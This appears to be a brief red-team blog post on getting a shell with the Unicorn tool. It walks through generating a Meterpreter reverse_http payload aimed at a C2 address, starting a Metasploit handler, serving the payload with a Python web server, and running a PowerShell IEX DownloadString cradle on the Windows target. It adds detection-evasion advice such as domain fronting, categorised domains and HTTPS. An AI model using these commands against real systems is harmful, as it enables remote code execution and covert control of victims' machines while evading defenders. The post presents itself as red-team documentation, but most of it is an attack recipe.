Payloads with Unicorn

Want to document some of my redteam experiences. How I got a shell recently.

basically download the latest version of unicorn from here :

cd unicorn
python windows/meterpreter/reverse_http [c2ip]  443

The above command will create two files.

"powershell_attack.txt" and "unicorn.rc" 

then, run

msfconsole -r unicorn.rc 

Does the magic, then your reverse handler should be created, at
At this point you may want to navigate to the above site and verify if the connection is working. Note: care needs to be taken to ensure you don't reveal the http site, use https where you can, and also use categorised domains, domain fronting etc. Pick your setup as per the business case.

Now, serve the payload, again take care on how you are serving (use tls/ssl)
sudo python -m SimpleHTTPServer 4443

Then run the following on the Windows machine. 

powershell "IEX (New-Object Net.WebClient).DownloadString(‘‘)"

Note: Do not use http for payload serving, this can be easily picked up. Also use a HTTPs reverse shell payload.

I will post how this can be achieved later.


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